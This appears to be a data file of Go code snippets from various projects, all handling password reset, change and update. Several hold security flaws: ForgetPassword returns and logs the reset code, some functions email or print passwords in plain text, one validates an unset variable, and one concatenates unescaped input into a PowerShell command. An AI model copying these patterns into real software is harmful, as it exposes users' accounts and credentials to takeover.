newPwd)\n\t}\n\tfor i := 0; i < 3; i++ {\n\t\tpass = []byte(string(pass) + \"a\")\n\t\texpiration := time.Now().Add(time.Duration(defaultOneTimePwdExpirationMinutes) * time.Second * 60)\n\t\tnewPwd, err := user.UpdatePasswordAfterReset(user.Password, pass, expiration)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Test fail: can't use the new password: '%v' (%v), return an error: %v\", pass, string(pass), err)\n\t\t} else {\n\t\t\terr := user.IsPasswordMatch(newPwd)\n\t\t\tif err != nil {\n\t\t\t\tt.Errorf(\"Test fail: correct password: '%v' (%v), return an error: %v\", newPwd, string(pass), err)\n\t\t\t}\n\t\t}\n\t}\n}", "func (c *RegistrationController) SetPassword(w http.ResponseWriter, r *http.Request) {\n\n\t// parse the JSON coming from the client\n\tvar passRequest passwordRequest\n\tdecoder := json.NewDecoder(r.Body)\n\n\t// check if the parsing succeeded\n\tif err := decoder.Decode(&passRequest); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Error parsing form values failed\")\n\t\treturn\n\t}\n\n\tif err := passwordsAreValid(passRequest.Password, passRequest.PasswordConfirmation); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Password invalid\")\n\t\treturn\n\t}\n\n\t//validate link\n\tuser, err := models.FindUserByVerificationUUID(passRequest.UUID)\n\n\tif err != nil {\n\t\tlog.Printf(\"Error setting password: %v is not a valid UUID\", passRequest.UUID)\n\t\tc.BadRequest(w, nil, \"Error verifying email address: %v is not a valid user identifier\", passRequest.UUID)\n\t\treturn\n\t}\n\n\tif !user.PasswordInvalid {\n\t\tc.Error500(w, nil, \"Password is already set\")\n\t\treturn\n\t}\n\n\tif err := user.UpdatePassword(passRequest.Password); err != nil {\n\t\tlog.Printf(\"Error updating the password in the database: %v\", err)\n\t\tc.Error500(w, err, \"Error updating the password in the database\")\n\t\treturn\n\t}\n\n\tc.Plain(\"\", w, r)\n\treturn\n}", "func ResetPassword(c echo.Context) error {\n\t// Read the json body\n\tb, err := ioutil.ReadAll(c.Request().Body)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, err.Error())\n\t}\n\n\t// Verify length\n\tif len(b) == 0 {\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": \"You have sent an empty json\"})\n\t}\n\n\t// Validate JSON\n\tl := gojsonschema.NewBytesLoader(b)\n\tresult, err := app.EmailSchema.Validate(l)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusBadRequest, err.Error())\n\t}\n\tif !result.Valid() {\n\t\tmsg := \"\"\n\t\tfor _, desc := range result.Errors() {\n\t\t\tmsg += fmt.Sprintf(\"%s, \", desc.Description())\n\t\t}\n\t\tmsg = strings.TrimSuffix(msg, \", \")\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": msg})\n\t}\n\n\t// Bind it to our User instance.\n\tvar jsonEmail map[string]interface{}\n\terr = json.Unmarshal(b, &jsonEmail)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, err.Error())\n\t}\n\tresetEmail := jsonEmail[\"email\"].(string)\n\n\t// check if email already exists in DB.\n\tEmailExist, _ := user.CheckEmailExist(resetEmail)\n\tif !EmailExist {\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": \"Email does not exists !\"})\n\t}\n\n\tu, err := user.GetUserByEmail(resetEmail)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, err.Error())\n\t}\n\n\ttoken, err := u.GenerateResetPasswordToken()\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, err.Error())\n\t}\n\n\t// Generate the email confirmation url\n\tlink := viper.GetString(\"ui.address\") + \"/reset-password\" + \"?token=\" + token\n\tgo email.Send(u.Username, link, u.Email, \"reset\")\n\n\treturn c.JSON(http.StatusOK, map[string]string{\n\t\t\"verbose_msg\": \"ok\",\n\t})\n}", "func ResetPassword(ticket *Task) {\n\n\tprintln(\"Login: \", ticket.User)\n\tpassword := newPassword(20)\n\tprintln(\"Password :\", password)\n\tcommand := exec.Command(\"PowerShell\", \"-Command\", \"Set-ADAccountPassword\", \"-Identity \"+ticket.User, \"-Reset\", \"-NewPassword (ConvertTo-SecureString -AsPlainText \"+password+\" -Force)\")\n\terr := run(command, ticket)\n\tif err != nil {\n\t\tprintln(\"Error\")\n\t\tchangeStatus(ticket, \"error\")\n\t\tsend(err.Error(), \"Error detected \"+\"For support\", \"[email protected]\")\n\t\t//log.Fatal(err)\n\t} else {\n\t\tsend(\"Password has been reset\\n\"+\"New password is :\"+password+\"\\n Verify your connection: RDP 35.231.245.199\", \"Reset password for account \"+ticket.User, ticket.Email)\n\t\tchangeStatus(ticket, \"done\")\n\t\tprintln(\"Action: password has been reset\")\n\t\tfmt.Println(\"Done\")\n\t}\n}", "func (s *Supervisor) passwordReset(token *auth.Token, mr *msg.Result) bool {\n\n\t// decrypt e2e encrypted request\n\t// token.UserName is the username\n\t// token.Password is the _NEW_ password that should be set\n\t// token.Token is the ldap password or mailtoken\n\n\t// validate external credentials\n\tswitch s.activation {\n\tcase `ldap`:\n\t\tif ok, err := validateLdapCredentials(token.UserName, token.Token); err != nil {\n\t\t\tmr.ServerError(err, mr.Section)\n\t\t\tmr.Super.Audit.WithField(`Code`, mr.Code).Warningln(err)\n\t\t\treturn false\n\t\t} else if !ok {\n\t\t\tmr.Forbidden(fmt.Errorf(`Invalid LDAP credentials`))\n\t\t\tmr.Super.Audit.\n\t\t\t\tWithField(`Code`, mr.Code).\n\t\t\t\tWarningln(mr.Error)\n\t\t\treturn false\n\t\t}\n\tcase `token`:\n\t\tmr.NotImplemented(fmt.Errorf(`Mail-Token not supported yet`),\n\t\t\tmr.Section)\n\t\tmr.Super.Audit.\n\t\t\tWithField(`Code`, mr.Code).\n\t\t\tWarningln(mr.Error)\n\t\treturn false\n\tdefault:\n\t\tmr.ServerError(fmt.Errorf(\"Unknown activation method: %s\",\n\t\t\ts.conf.Auth.Activation), mr.Section)\n\t\tmr.Super.Audit.\n\t\t\tWithField(`Code`, mr.Code).\n\t\t\tWarningln(mr.Error)\n\t\treturn false\n\t}\n\n\treturn true\n}", "func UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tuserID := r.Context().Value(utils.TokenContextKey).(string)\n\ttempAccout := &receivePasswordInfo{}\n\terr := json.NewDecoder(r.Body).Decode(tempAccout)\n\tif err != nil {\n\t\tutils.JSONRespnseWithErr(w, &utils.ErrPostDataNotCorrect)\n\t\treturn\n\t}\n\tmessage := models.UpdatePassword(userID, tempAccout.Password, tempAccout.NewPassword)\n\tutils.JSONResonseWithMessage(w, message)\n}", "func ForgetPassword(w http.ResponseWriter, req *http.Request) {\n\t//log\n\tnow, userIP := globalPkg.GetIP(req)\n\tlogobj := logpkg.LogStruct{\"_\", now, userIP, \"macAdress\", \"ForgetPassword\", \"AccountModule\", \"_\", \"_\", \"_\", 0}\n\n\tRandomCode := encodeToString(globalPkg.GlobalObj.MaxConfirmcode)\n\tcurrent := globalPkg.UTCtime()\n\tConfirmationCode := RandomCode\n\tcontact := ResetPasswordData{}\n\tdecoder := json.NewDecoder(req.Body)\n\tdecoder.DisallowUnknownFields()\n\terr := decoder.Decode(&contact)\n\tif err != nil {\n\t\tresponseObj := responses.FindResponseByID(\"1\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"please enter your correct request\", \"failed\")\n\t\treturn\n\t}\n\t// ForgetPassword email is lowercase and trim\n\tcontact.Email = convertStringTolowerCaseAndtrimspace(contact.Email)\n\tRP := ResetPasswordData{}\n\tRP.Code = ConfirmationCode\n\tRP.CurrentTime = current\n\taccountObjbyEmail := getAccountByEmail(contact.Email)\n\taccountObjByPhone := getAccountByPhone(contact.Phonnum)\n\tforgetObj := ForgetPasswordReturn{}\n\tif accountObjbyEmail.AccountPublicKey != \"\" && contact.Email != \"\" {\n\n\t\tRP.Email = contact.Email\n\t\tRP.PathAPI = globalPkg.RandomPath()\n\t\tbroadcastTcp.BoardcastingTCP(RP, \"addRestPassword\", \"account module\")\n\t\t//addResetpassObjInTemp(RP)\n\t\t//body email for forget password\n\t\tbody := \"Dear \" + accountObjbyEmail.AccountName + `,\n\t\tYou recently requested to reset your password for your Inovation Corporation account.\n\t\tYour confirmation code is: ` + RP.Code + `.\n\t\tif you did not request a password reset, please ignore this email or reply to let us know.\n\t\t\n\t\tRegards,\n\t\tInovatian Team`\n\n\t\tsendEmail(body, contact.Email)\n\t\tforgetObj.Code = RP.Code\n\t\tforgetObj.PathAPI = RP.PathAPI\n\t\tjsonObj, _ := json.Marshal(forgetObj)\n\t\tglobalPkg.SendResponse(w, jsonObj)\n\t\t//globalPkg.SendResponseMessage(w, Confirmation_code)\n\t\tglobalPkg.WriteLog(logobj, \"success send confirmation code\"+RP.Code, \"success\")\n\t\treturn\n\t}\n\n\tif accountObjByPhone.AccountPublicKey != \"\" && contact.Phonnum != \"\" {\n\n\t\tRP.Phonnum = contact.Phonnum\n\t\tRP.PathAPI = globalPkg.RandomPath()\n\t\tbroadcastTcp.BoardcastingTCP(RP, \"addRestPassword\", \"account module\")\n\t\t//addResetpassObjInTemp(RP)\n\t\tsendSMS(contact.Phonnum, RP.Code)\n\t\tforgetObj.Code = RP.Code\n\t\tforgetObj.PathAPI = RP.PathAPI\n\n\t\tjsonObj, _ := json.Marshal(forgetObj)\n\t\tglobalPkg.SendResponse(w, jsonObj)\n\t\tglobalPkg.WriteLog(logobj, \"success send confirmation code\"+RP.Code, \"success\")\n\t\treturn\n\t}\n\tresponseObj := responses.FindResponseByID(\"11\")\n\tglobalPkg.SendError(w, responseObj.EngResponse)\n\tglobalPkg.WriteLog(logobj, \"invalid Email Or Phone\"+RP.Code, \"failed\")\n\n}", "func ChangePassword(w http.ResponseWriter, r *http.Request) {\n\tauth := service.GetSessionMember(r)\n\tmember := model.GetMemberByID(auth.ID)\n\n\tif err := r.ParseMultipartForm(setting.FileMaxSize); err != nil {\n\t\tLogger.Error(err.Error())\n\t}\n\n\tnewPassword := r.FormValue(\"newPassword\")\n\tconfirmPassword := r.FormValue(\"confirmPassword\")\n\toldPassword := r.FormValue(\"oldPassword\")\n\n\tpasswordData := map[string]string{\n\t\t\"password\": newPassword,\n\t\t\"confirmPassword\": confirmPassword,\n\t}\n\n\tvalidateError := model.ValidatePassword(passwordData)\n\n\t// check if password is correct\n\t_, err := model.Authenticated(member.LoginID, oldPassword)\n\n\tif err != nil {\n\t\tvalidateError[\"oldPassword\"] = \"Password is not correct.\"\n\t}\n\n\tif len(validateError) == 0 {\n\t\tmodel.UpdatePassword(newPassword, member)\n\t\thttp.Redirect(w, r, \"/my_page\", 301)\n\t}\n\n\ttemplateData := map[string]interface{}{\n\t\t\"title\": \"Change Password\",\n\t\t\"validateError\": validateError,\n\t\t\"auth\": auth,\n\t}\n\n\ttmpl := template.Must(template.ParseFiles(\"template/admin_members/change_password.tmpl\", setting.UserTemplate))\n\tif err := tmpl.ExecuteTemplate(w, \"base\", templateData); err != nil {\n\t\tLogger.Error(err.Error())\n\t}\n}", "func (um *UserManager) ResetPassword(username string) (string, error) {\n\tu, err := um.FindByUserName(username)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\trandUtils := utils.GenerateRandomUtils()\n\tnewPassword := randUtils.GenerateString(32, utils.LetterBytes)\n\thashedPass, err := bcrypt.GenerateFromPassword([]byte(newPassword), bcrypt.DefaultCost)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif check := um.DB.Model(u).Update(\"hashed_password\", hex.EncodeToString(hashedPass)); check.Error != nil {\n\t\treturn \"\", check.Error\n\t}\n\treturn newPassword, nil\n}", "func ResetPassword(opts *ResetOpts) error {\n\tvar outBuffer bytes.Buffer\n\tstart := time.Now()\n\n\tlogWriter := NewLogWriter(opts.B)\n\tdefer logWriter.Close()\n\twriter := io.MultiWriter(&outBuffer, &logWriter)\n\terr := updateNewPassword(opts, writer)\n\telapsed := time.Since(start)\n\tif err != nil {\n\t\treturn err\n\t}\n\tlog.Debugf(\"%s in (%s)\\n%s\",\n\t\tcmd.Colorfy(opts.B.GetFullName(), \"cyan\", \"\", \"bold\"),\n\t\tcmd.Colorfy(elapsed.String(), \"green\", \"\", \"bold\"),\n\t\tcmd.Colorfy(outBuffer.String(), \"yellow\", \"\", \"\"))\n\treturn nil\n}", "func (a *API) changePassword(w http.ResponseWriter, req *http.Request) {\n\tvars := mux.Vars(req)\n\tusername := vars[\"user\"]\n\tif username == config.Get().AdminAuthentication.Username {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusForbidden,\n\t\t\terr: errors.New(\"Cannot change administrator's password\"),\n\t\t})\n\t\treturn\n\t}\n\tif err := req.ParseForm(); err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusBadRequest,\n\t\t\terr: err,\n\t\t})\n\t\treturn\n\t}\n\tpassword := req.Form.Get(\"password\")\n\tif password == \"\" {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusBadRequest,\n\t\t\terr: errors.New(\"Incorrect change password form\"),\n\t\t})\n\t\treturn\n\t}\n\t// Check an user is existing\n\tpath := common.Path(model.DefaultUsersPrefix, common.Hash(username, crypto.MD5))\n\tresp, err := a.etcdcli.DoGet(path)\n\tif err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusInternalServerError,\n\t\t\terr: err,\n\t\t})\n\t\treturn\n\t}\n\tif len(resp.Kvs) == 0 {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusBadRequest,\n\t\t\terr: errors.New(\"Unknown user\"),\n\t\t})\n\t\treturn\n\t}\n\t// Hash for new password\n\thashedpw, err := common.GenerateBcryptHash(password, config.Get().PasswordHashingCost)\n\tif err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusInternalServerError,\n\t\t\terr: errors.Wrap(err, \"Something went wrong\"),\n\t\t})\n\t\treturn\n\t}\n\n\tuser := &model.User{\n\t\tUsername: username,\n\t\tPassword: hashedpw,\n\t}\n\t_ = user.Validate()\n\tr, _ := json.Marshal(&user)\n\t_, err = a.etcdcli.DoPut(path, string(r))\n\tif err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusInternalServerError,\n\t\t\terr: errors.Wrap(err, \"Unable to put a key-value pair into etcd\"),\n\t\t})\n\t\treturn\n\t}\n\ta.respondSuccess(w, http.StatusOK, nil)\n}", "func (h *AuthHandlers) ChangePwd(w http.ResponseWriter, req *http.Request) {\n\tvar err error\n\tvar data []byte\n\n\tsystemContext, err := h.getSystemContext(req)\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"request context retrevial failure\")\n\t\tmiddleware.ReturnError(w, err.Error(), 500)\n\t\treturn\n\t}\n\n\tif data, err = ioutil.ReadAll(req.Body); err != nil {\n\t\tlog.Error().Err(err).Msg(\"read body error\")\n\t\tmiddleware.ReturnError(w, \"error reading changepwd data\", 500)\n\t\treturn\n\t}\n\tdefer req.Body.Close()\n\n\tloginDetails := &authz.LoginDetails{}\n\tif err := json.Unmarshal(data, loginDetails); err != nil {\n\t\tlog.Error().Err(err).Msg(\"marshal body error\")\n\t\tmiddleware.ReturnError(w, \"error reading changepwd data\", 500)\n\t\treturn\n\t}\n\tlog.Info().Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"changepwd called\")\n\tif err := h.validate.Struct(loginDetails); err != nil {\n\t\tmiddleware.ReturnError(w, \"validation failure \"+err.Error(), 500)\n\t\treturn\n\t}\n\n\tloginDetails.OrgName = strings.ToLower(loginDetails.OrgName)\n\tloginDetails.Username = strings.ToLower(loginDetails.Username)\n\n\torgData, err := h.getOrgByName(req.Context(), systemContext, loginDetails.OrgName)\n\tif err != nil {\n\t\tlog.Error().Err(err).Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"failed to get organization from name\")\n\t\tmiddleware.ReturnError(w, \"forgot password confirm failed\", 403)\n\t\treturn\n\t}\n\n\tif _, err := h.authenticator.SetNewPassword(req.Context(), orgData, loginDetails); err != nil {\n\t\tlog.Error().Err(err).Str(\"org\", loginDetails.OrgName).Str(\"user\", loginDetails.Username).Msg(\"set new password failed\")\n\t\tmiddleware.ReturnError(w, \"set new password failed\", 403)\n\t\treturn\n\t}\n\n\tresp := make(map[string]string, 0)\n\tresp[\"status\"] = \"ok\"\n\n\trespData, _ := json.Marshal(resp)\n\tw.WriteHeader(200)\n\tfmt.Fprint(w, string(respData))\n}", "func (m *ManagerMutation) ResetPassword() {\n\tm.password = nil\n}", "func ResetPassword(c *eclcloud.ServiceClient, id string, opts ResetPasswordOpts) (r ResetPasswordResult) {\n\tb, err := opts.ToLoadBalancerActionResetPasswordMap()\n\tif err != nil {\n\t\tr.Err = err\n\t\treturn\n\t}\n\t_, r.Err = c.Post(resetPasswordURL(c, id), b, &r.Body, &eclcloud.RequestOpts{\n\t\tOkCodes: []int{200},\n\t})\n\treturn\n}", "func (c *Client) ResetPassword(rp *www.ResetPassword) (*www.ResetPasswordReply, error) {\n\tresponseBody, err := c.makeRequest(http.MethodPost,\n\t\twww.PoliteiaWWWAPIRoute, www.RouteResetPassword, rp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar rpr www.ResetPasswordReply\n\terr = json.Unmarshal(responseBody, &rpr)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unmarshal ResetPasswordReply: %v\", err)\n\t}\n\n\tif c.cfg.Verbose {\n\t\terr := prettyPrintJSON(rpr)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn &rpr, nil\n}", "func UserUpdatePassword(id int, n string) {\n\tvar i int\n\ti = GetIndexOfUser(id)\n\tuserList[i].uPassword = n\n}", "func AdminUserPwdUpdate(context *gin.Context,\n\tcacheDB int,\n\tsqlHandle,\n\tadminUserID,\n\tadminUserPwd,\n\tadminUserAginPwd string) *protocol.Response {\n\n\tvar pwd, oldPwd string\n\tvar err error\n\tvar oldUser *models.AdminUser\n\tvar errResult protocol.Response\n\n\tif !util.VerifyPasswordFormat(pwd) {\n\t\tlog.Debug(\"Modify admin user password format error:%s\", pwd)\n\t\terrResult = code.SpawnErrPwdFormat()\n\t\tgoto fail\n\t}\n\n\tif pwd != adminUserAginPwd {\n\t\tlog.Debug(\"Modify admin user password first!=second\")\n\t\terrResult = code.SpawnErrPwdAgin()\n\t\tgoto fail\n\t}\n\n\toldUser, err = database.AdminUserQueryPwd(sqlHandle, adminUserID)\n\tif err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tpwd, err = aes.Encrypt(oldUser.Secret, adminUserPwd)\n\n\tif err = database.AdminUserPwdUpdate(sqlHandle, adminUserID, pwd); err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tif oldPwd, err = database.GetRdsOnlineAdminPassword(cacheDB, adminUserID); err == nil {\n\t\tif oldPwd != pwd {\n\t\t\tif err = database.WithRdsOnlineAdminPwd(cacheDB, adminUserID, pwd); err != nil {\n\t\t\t\tlog.Debug(\"Modify admin user online password error:%s\", err.Error())\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\nfail:\n\treturn &errResult\n}", "func resetPassword(model *ResetPasswordModel) api.Response {\n\tif model.Password != model.PasswordConfirmation {\n\t\treturn api.BadRequest(ErrPasswordsDoNotMatch)\n\t}\n\n\tvar err = auth.ResetPassword(model.Token, model.Password)\n\tif err != nil {\n\t\tif err == auth.ErrResetPasswordTokenExpired {\n\t\t\treturn api.BadRequest(err)\n\t\t}\n\n\t\treturn api.InternalServerError(err)\n\t}\n\n\treturn api.StatusResponse(http.StatusNoContent)\n}", "func (us *UserStorage) ResetPassword(id, password string) error {\n\tif !bson.IsObjectIdHex(id) {\n\t\treturn model.ErrorWrongDataFormat\n\t}\n\ts := us.db.Session(UsersCollection)\n\tdefer s.Close()\n\n\thash := PasswordHash(password)\n\tupdate := bson.M{\"$set\": bson.M{\"pswd\": hash}}\n\treturn s.C.UpdateId(bson.ObjectIdHex(id), update)\n}", "func (us *UserStorage) ResetPassword(id, password string) error {\n\tif !bson.IsObjectIdHex(id) {\n\t\treturn model.ErrorWrongDataFormat\n\t}\n\ts := us.db.Session(UsersCollection)\n\tdefer s.Close()\n\n\thash := PasswordHash(password)\n\tupdate := bson.M{\"$set\": bson.M{\"pswd\": hash}}\n\treturn s.C.UpdateId(bson.ObjectIdHex(id), update)\n}", "func resetPwdAPI(w http.ResponseWriter, r *http.Request) handler.JSON {\n\tresp := appHandler.JSONResponse(w, r)\n\tparams := resp.Params()\n\tpwd := clib.MustGetMinMaxStringFromDict(params, \"pwd\", appDef.LenMinUserPwd, appDef.LenMaxUserPwd)\n\tkey := clib.MustGetStringFromDict(params, \"key\", -1)\n\n\tuidStr, err := appService.Get().ResetPwdVerifier.Verify(key)\n\tappcm.PanicOn(err, \"failed to verify reset password key\")\n\n\tlang := appcm.ContextLanguage(r.Context())\n\tls := appHandler.MainPage().Dictionary(lang)\n\tif uidStr == \"\" {\n\t\treturn resp.MustFail(ls.ResetPwdSessionExpiredErr)\n\t}\n\n\ttargetUID, err := strconvx.ParseUint64(uidStr)\n\tappcm.PanicOn(err, \"failed to parse UID\")\n\n\tif targetUID == 0 {\n\t\treturn resp.MustFail(\"unexpected 0 UID\")\n\t}\n\n\tpwdHash, err := appService.Get().HashingAlg.CreateHash(pwd)\n\tappcm.PanicOn(err, \"failed to create hash\")\n\n\tdb := appDB.DB()\n\thasPwd, err := da.UserPwd.HasUser(db, targetUID)\n\tappcm.PanicOn(err, \"failed to check if user has password\")\n\n\tif !hasPwd {\n\t\treturn resp.MustFail(\"user has no password\")\n\t}\n\n\t// Update password.\n\terr = da.UserPwd.UpdateHashByID(db, targetUID, pwdHash)\n\tappcm.PanicOn(err, \"failed to update password\")\n\n\t// TODO: force logout all sessions!\n\treturn resp.MustComplete(nil)\n}", "func (h *AuthHandler) UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tview := NewView(r)\n\n\tuser := context.User(r.Context())\n\tif user == nil {\n\t\thttp.Redirect(w, r, \"/signin\", http.StatusFound)\n\t\treturn\n\t}\n\n\temail := user.Email\n\toldPassword := view.FormValue(\"oldPassword\", true)\n\tnewPassword := view.FormValue(\"newPassword\", true)\n\tconfirmPassword := view.FormValue(\"confirmPassword\", true)\n\n\tif view.HasError() {\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\n\tif len(newPassword) < h.PasswordLength || len(confirmPassword) < h.PasswordLength {\n\t\tview.InsertFlashError(\"Passwords must be at least \", h.PasswordLength, \" characters long\")\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\tif newPassword != confirmPassword {\n\t\tview.InsertFlashError(\"Passwords must be matched\")\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\n\terr := h.AuthInteractor.UpdatePassword(email, oldPassword, newPassword)\n\tif err != nil {\n\t\tview.InsertFlashError(err.Error())\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\n\tview.InsertFlash(\"Your password succesfully changed\")\n\tview.Render(w, \"auth/password\")\n}", "func (srv *Service) ResetUserPassword(id string, password string) (*string, error) {\n\t//generate hash from the password\n\tcrypt := pkg.EncryptPassword(password)\n\n\t//check if the email already exists\n\tuser, err := srv.mongoRepository.GetUserByID(id)\n\tif user == nil { //user doesn't exist\n\t\treturn nil, &pkg.Error{Err: err, Code: http.StatusNotFound, Message: \"User with these credentials not found\"}\n\t}\n\n\t//call driven adapter responsible for updating a user's password inside the database\n\t_, err = srv.mongoRepository.UpdateUserPassword(id, string(crypt))\n\n\tif err != nil {\n\t\t//return the error sent by the repository\n\t\treturn nil, err\n\t}\n\n\tdata := &email.Email{\n\t\tSenderName: \"Pod Chef team\",\n\t\tSubject: \"Your password has been reseted!\",\n\t\tPassword: password,\n\t}\n\n\temailBody :=\n\t\t\"Hi,\\n\" +\n\t\t\t\"Your account password has been reseted.\\n\" +\n\t\t\t\"Please use the following password to login next time: \" + data.Password + \"\\n\" +\n\t\t\t\"\\nWith The best regards, \" + data.SenderName + \".\\n\" +\n\t\t\t\"\\nPS: This password should only be temporary!!!\"\n\n\t//call driven adapter responsible for sending an email\n\terr = srv.emailRepository.SendEmailSMTP(user.Email, data.Subject, emailBody)\n\n\tmessage := \"User's password reseted sucessfully\"\n\n\treturn &message, nil\n}", "func (c *Carton) ResetPassword() error {\n\tboxs := *c.Boxes\n\terr := ResetPassword(&ResetOpts{B: &boxs[0]})\n\tif err != nil {\n\t\tlog.Errorf(\"Unable to reset vm root password %s\", err)\n\t\treturn err\n\t}\n\treturn nil\n}", "func (m *EmployeeMutation) ResetPassword() {\n\tm.password = nil\n}", "func (m *EmployeeMutation) ResetPassword() {\n\tm.password = nil\n}", "func (m *EmployeeMutation) ResetPassword() {\n\tm.password = nil\n}", "func ResetPassword(params graphql.ResolveParams) (interface{}, error) {\n\to := orm.NewOrm()\n\tphoneStr := params.Args[\"phone\"].(string)\n\tmsgCodeStr := params.Args[\"smsCode\"].(string)\n\tpasswordStr := params.Args[\"password\"].(string)\n\n\trootValue := params.Info.RootValue.(map[string]interface{})\n\n\tsessPhone := rootValue[\"phone\"]\n\tsessMsgCode := rootValue[\"smsCode\"]\n\n\tif sessPhone == nil || sessMsgCode == nil || phoneStr != sessPhone || msgCodeStr != sessMsgCode {\n\t\t// 用户发送验证码的手机号与提交注册时的手机号不匹配,按照验证码不正确处理\n\t\treturn nil, models.Error{Message: \"smsCode incorrect.\"}\n\t}\n\n\t// validate password\n\tif len(passwordStr) < 6 {\n\t\treturn nil, models.Error{Message: \"password is too short.\"}\n\t}\n\n\tuser := models.User{Phone: phoneStr}\n\tif err := o.Read(&user, \"phone\"); err != nil {\n\t\treturn nil, models.Error{Message: \"get user failed.\", OriErr: err}\n\t}\n\n\tuser.Password = utils.Encrypt(passwordStr)\n\tif _, err := o.Update(&user, \"password\"); err != nil {\n\t\treturn nil, models.Error{Message: \"update password failed.\", OriErr: err}\n\t}\n\n\trootValue[\"currentUser\"] = nil\n\trootValue[\"smsCode\"] = nil\n\trootValue[\"setSession\"] = []string{\"currentUser\", \"smsCode\"}\n\n\treturn user, nil\n}", "func (m *UserResource) ResetPassword(ctx context.Context, userId string, qp *query.Params) (*ResetPasswordToken, *Response, error) {\n\turl := fmt.Sprintf(\"/api/v1/users/%v/lifecycle/reset_password\", userId)\n\tif qp != nil {\n\t\turl = url + qp.String()\n\t}\n\n\trq := m.client.CloneRequestExecutor()\n\n\treq, err := rq.WithAccept(\"application/json\").WithContentType(\"application/json\").NewRequest(\"POST\", url, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar resetPasswordToken *ResetPasswordToken\n\n\tresp, err := rq.Do(ctx, req, &resetPasswordToken)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn resetPasswordToken, resp, nil\n}", "func (c *Client) ResetPassword(token, password, passwordConfirm string) (err error) {\n\n\t// Basic requirements\n\tif len(token) == 0 {\n\t\terr = c.createError(fmt.Sprintf(\"missing required attribute: %s\", fieldToken), http.StatusBadRequest)\n\t\treturn\n\t} else if len(token) <= 10 {\n\t\terr = c.createError(fmt.Sprintf(\"invalid token: %s\", token), http.StatusBadRequest)\n\t\treturn\n\t} else if len(password) == 0 || len(passwordConfirm) == 0 {\n\t\terr = c.createError(fmt.Sprintf(\"missing required attribute: %s or %s\", fieldPassword, fieldPasswordConfirm), http.StatusBadRequest)\n\t\treturn\n\t} else if password != passwordConfirm {\n\t\terr = c.createError(\"given passwords don't match\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\t// Start the post data\n\tdata := map[string]string{fieldToken: token, fieldPassword: password, fieldPasswordConfirm: passwordConfirm}\n\n\t// Fire the Request\n\tvar response string\n\tif response, err = c.Request(fmt.Sprintf(\"%s/password/reset\", modelUser), http.MethodPut, data); err != nil {\n\t\treturn\n\t}\n\n\t// Only a 200 is treated as a success\n\terr = c.Error(http.StatusOK, response)\n\treturn\n}", "func (h *auth) UpdatePassword(c echo.Context) error {\n\t// Filter params\n\tvar params service.UpdatePasswordParams\n\tif err := c.Bind(&params); err != nil {\n\t\tlog.Println(\"Could not get parameters:\", err)\n\t\treturn c.JSON(http.StatusUnauthorized, sferror.New(\"Could not get parameters.\"))\n\t}\n\n\tparams.UserAgent = c.Request().UserAgent()\n\tparams.Session = currentSession(c)\n\n\t// Check CurrentPassword presence.\n\tif params.CurrentPassword == \"\" {\n\t\treturn c.JSON(http.StatusUnauthorized,\n\t\t\tsferror.New(\"Your current password is required to change your password. Please update your application if you do not see this option.\"))\n\t}\n\n\t// Check NewPassword presence.\n\tif params.NewPassword == \"\" {\n\t\treturn c.JSON(http.StatusUnauthorized,\n\t\t\tsferror.New(\"Your new password is required to change your password. Please update your application if you do not see this option.\"))\n\t}\n\n\tuser := currentUser(c)\n\n\t// When id parameter passed, check it's the same like in bearer token.\n\tif c.Param(\"id\") != \"\" && c.Param(\"id\") != user.ID {\n\t\treturn c.JSON(http.StatusUnauthorized, sferror.New(\"The given ID is not the user's one.\"))\n\t}\n\n\tservice := service.NewUser(h.db, h.sessions, params.APIVersion)\n\tpassword, err := service.Password(user, params)\n\tif err != nil {\n\t\tif h.db.IsAlreadyExists(err) {\n\t\t\treturn c.JSON(http.StatusUnauthorized, sferror.New(\"The email you entered is already taken. Please try 